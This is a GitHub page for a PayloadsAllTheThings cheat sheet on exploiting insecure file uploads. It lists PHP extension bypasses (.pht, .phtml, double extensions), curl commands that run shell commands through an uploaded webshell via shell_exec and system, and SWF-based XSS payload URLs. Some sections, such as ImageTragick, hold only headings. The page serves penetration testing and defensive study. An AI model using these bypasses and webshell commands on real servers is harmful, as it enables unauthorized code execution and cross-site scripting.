PayloadsAllTheThings/Upload insecure files/README.md
2019-01-28 20:27:45 +01:00

69 lines
1.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Upload
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
## Exploits
### Image Tragik
```powershell
HTTP Request
Reverse Shell
Touch command
```
### PHP Extension
```powershell
.php
Less known extension
.pht
.pgif
.phtml
.shtml
Double extension
.jpeg.php
.png.php
```
### PNG Bypass a resize
Upload the picture and use a local file inclusion
```powershell
You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"
```
### JPG Bypass a resize
Upload the picture and use a local file inclusion
```powershell
http://localhost/test.php?c=ls
```
### XSS via SWF
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
```powershell
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(?js=history.go(-1),_self);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(invalidfileinvalidfileinvalidfile,target);setTimeout(alert(w.document.location);w.close();,1);
```
### .htaccess
An .htaccess file is a way to configure the details of your website without needed to alter the server config files.
## References
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil